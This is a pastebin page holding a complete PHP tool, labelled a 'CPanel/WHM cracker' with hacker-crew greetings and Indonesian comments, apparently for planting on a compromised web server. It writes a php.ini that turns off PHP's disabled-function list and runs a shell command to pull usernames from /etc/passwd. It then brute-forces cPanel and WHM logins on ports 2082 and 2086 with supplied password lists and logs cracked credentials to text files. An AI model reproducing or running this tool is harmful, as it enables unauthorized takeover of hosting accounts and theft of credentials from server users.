SHOW:
|
|
- or go back to the newest paste.
1 | <title>--==[[P1nk || n63507]]==--</title> | |
2 | <body bgcolor=black> | |
3 | <p h3 style="text-align:center"> | |
4 | <div align=center> | |
5 | <table width=100%> | |
6 | <tr> | |
7 | <td align=center> | |
8 | <font size=6 color=white face="comic sans ms"> RR</font> | |
9 | <font size=5 color=white face="comic sans ms"> CPanel/WHM</font> | |
10 | <font size=5 color=white face="comic sans ms"> cracker By </font> | |
11 | <font size=5 color=white face="comic sans ms">P1nk</font> | |
12 | <font size=6 color=white face="comic sans ms"></font> <br> | |
13 | <font color="green" face="comic sans ms"size="1"> | |
14 | <font color=white><b>-==[[Greetz to]]==--</font><br> | |
15 | <font color=green size=2> 312w177 | Biang Kerox Hacker Team -- <br> | |
16 | <font color=white>--==[[RACIKANE]]==--</font><br># P1nk #</table> | |
17 | </table> | |
18 | <div align=center> | |
19 | <font color=white size=4 face='comic sans ms'>>>> <a href="<?php echo '?ini'; ?>"><font color=white size=3>rUn php.1n1 first of 4ll</b></font></a> | |
20 | <font color=white size=4 face='comic sans ms'>       <a href="<?php echo '?/var/mail'; ?>"><font color=white size=3>Us3rN4m3 ExTracTor</font></a>    <?php $r=gethostbyname($_SERVER["HTTP_HOST"]); $s="<a href=http://".$r.":2082><font color=white size=4 face='comic sans ms'>link for cpanel login</a>"; echo $s; ?> <<<<br> | |
21 | <?php | |
22 | if(isset($_GET['ini'])){ | |
23 | $r=@fopen('php.ini',w); | |
24 | $s="disable_functions =none "; | |
25 | $t=@fwrite($r,$s); | |
26 | echo "<p><a href=php.ini><font color=white size=4 face='comic sans ms'>link to php.ini</a>"; | |
27 | } | |
28 | ?> | |
29 | <?php | |
30 | if(isset($_GET['/var/mail'])){ | |
31 | ?> | |
32 | <form method=post> | |
33 | <textarea style="background:black;color:white" name=pass rows=20 cols=20 ><?php $r="cat /etc/passwd | cut -d \":\" -f 1"; echo shell_exec($r); ?></textarea><br> | |
34 | <input type=submit name=subm value="click untuk Copy all usernames to username filed" /></form> | |
35 | <?php | |
36 | } | |
37 | ?> | |
38 | <form method=post> | |
39 | <div align=center> | |
40 | <font color=red size=3 face='comic sans ms'>/--------------------------------------------\<br></font> | |
41 | <div align=center> | |
42 | <font color=white size=3 face='comic sans ms'> {    Usernames          Passwords       }</font> | |
43 | </table> | |
44 | <br> | |
45 | <div align=center> | |
46 | <font color=green size=3 face='comic sans ms'>\-------------------------------------------/</font><br> | |
47 | <table> | |
48 | <font color=white size=3 face="comic sans ms">Attack => | |
49 | <select name="op"> | |
50 | <option name="op" value="cp">CPanel</option> | |
51 | <option name="op" value="whm">WHMPanel</option> | |
52 | </table> | |
53 | <br> | |
54 | <?php | |
55 | if(isset($_POST['subm'])){ | |
56 | $pa=$_POST["pass"]; | |
57 | ?> | |
58 | <textarea style="background:black;color:white" rows=25 cols=25 name=usernames><?php echo $pa; ?></textarea> | |
59 | <?php | |
60 | }else{ | |
61 | ?> | |
62 | <textarea style="background:black;color:white" rows=25 cols=25 name=usernames></textarea> | |
63 | <?php } ?> | |
64 |   <textarea style="background:black;color:white" rows=25 cols=25 name=passwords></textarea> | |
65 | <br> | |
66 | <br> | |
67 | <input type=submit name=cracking value="Tusbol Nang Kene Coxx"/> | |
68 | </form> | |
69 | <br> | |
70 | <?php | |
71 | error_reporting(0); | |
72 | $connect_timeout=5; | |
73 | set_time_limit(0); | |
74 | $submit=$_POST['submit']; | |
75 | $userl=$_POST['usernames']; | |
76 | $passl=$_POST['passwords']; | |
77 | $attack=$_POST['op']; | |
78 | $target = "localhost"; | |
79 | if(isset($_POST['cracking'])){ | |
80 | if($userl!=="" && $passl!==""){ | |
81 | if($_POST["op"]=="cp"){ | |
82 | @fopen('/cie/cie/ada/yang/kepo/haha.txt','a'); | |
83 | echo "Tunggu Sebentar ^_^ sekarang kita plorotin cpanels .... silahkan menunggu sampai akhir proses \n"; echo "<p> | |
84 | <a href=/cie/cie/ada/yang/kepo/haha.txt><font color=white size=2 face='comic sans ms'>di sini adalah link untuk file, yang akan menyimpan username cpanel Cracked </font></a></p><br>"; } else if($_POST["op"]=="whm"){ | |
85 | @fopen('cracked_whm.txt','a'); | |
86 | echo "Tunggu Sebentar ^_^ sekarang kita plorotin cpanels whm .... silahkan menunggu sampai akhir proses"; | |
87 | echo "<p><a href=cracked_whm.txt><font color=white size=2 face='comic sans ms'>di sini adalah link untuk file, yang akan menyimpan username cpanel whm Cracked dengan </font></a></p><br>"; | |
88 | } | |
89 | function cpanel($host,$user,$pass,$timeout){ | |
90 | $ch = curl_init(); | |
91 | curl_setopt($ch, CURLOPT_URL, "http://$host:2082"); | |
92 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
93 | curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); | |
94 | curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); | |
95 | curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); | |
96 | curl_setopt($ch, CURLOPT_FAILONERROR, 1); | |
97 | $data = curl_exec($ch); | |
98 | if ( curl_errno($ch) == 0 ) | |
99 | { | |
100 | echo "<table width=100%> | |
101 | <tr> | |
102 | <td align=center><b><font color=white size=2>==================================</font> | |
103 | <font color=red size=2> $user </font> | |
104 | <font color=white size=2>cracked with </font> | |
105 | <font color=red size=2> $pass </font> | |
106 | <font color=white size=2>==================================</font></b></td> | |
107 | </tr> | |
108 | </table>"; | |
109 | $x=$user." ".$pass ." \n"; | |
110 | $y= @fopen('/cie/cie/ada/yang/kepo/haha.txt','a+'); | |
111 | @fwrite($y,$x); | |
112 | } | |
113 | curl_close($ch); | |
114 | } | |
115 | $userlist=explode("\n",$userl); | |
116 | $passlist=explode("\n",$passl); | |
117 | foreach ($userlist as $user) { | |
118 | $finaluser = trim($user); | |
119 | foreach ($passlist as $password ) { | |
120 | $finalpass = trim($password); | |
121 | if ($attack == "cp"){ | |
122 | echo "<table width=80%> | |
123 | <tr> | |
124 | <td align=center><b><font color=red size=1>Attacking user $user with password $password </font></td> | |
125 | </tr> | |
126 | </table>"; | |
127 | cpanel($target,$finaluser,$finalpass,$connect_timeout); | |
128 | } | |
129 | } | |
130 | } | |
131 | function whm($host,$user,$pass,$timeout){ | |
132 | $ch = curl_init(); | |
133 | curl_setopt($ch, CURLOPT_URL, "http://$host:2086"); | |
134 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
135 | curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); | |
136 | curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); | |
137 | curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); | |
138 | curl_setopt($ch, CURLOPT_FAILONERROR, 1); | |
139 | $data = curl_exec($ch); | |
140 | if ( curl_errno($ch) == 0 ){ | |
141 | echo "<table width=100%> | |
142 | <tr> | |
143 | <td align=center><b><font color=white size=2>==================================</font> | |
144 | <font color=red size=2> $user </font> | |
145 | <font color=white size=2>cracked with </font> | |
146 | <font color=red size=2> $pass </font> | |
147 | <font color=white size=2>==================================</font></b></td> | |
148 | </tr> | |
149 | </table>"; | |
150 | $x=$user." ".$pass ." \n"; | |
151 | $y=@fopen('cracked_whm.txt','a+'); | |
152 | @fwrite($y,$x); | |
153 | } | |
154 | curl_close($ch); | |
155 | } | |
156 | $userlist=explode("\n",$userl); | |
157 | $passlist=explode("\n",$passl); | |
158 | foreach ($userlist as $user) { | |
159 | $finaluser = trim($user); | |
160 | foreach ($passlist as $password ) { | |
161 | $finalpass = trim($password); | |
162 | if ($attack == "whm"){ | |
163 | echo "<table width=80%> | |
164 | <tr> | |
165 | <td align=center><b><font color=white size=2>user under attack is $user </font></td> | |
166 | </tr> | |
167 | </table>"; | |
168 | whm($target,$finaluser,$finalpass,$connect_timeout);} | |
169 | } | |
170 | } | |
171 | }else if($userl==""){ | |
172 | echo "what are you doing :( , you have left userlist field empty"; | |
173 | } else if($passl=="") { | |
174 | echo "bhai ji :( ... please put passwords in paasword list field"; | |
175 | } | |
176 | } | |
177 | ?> |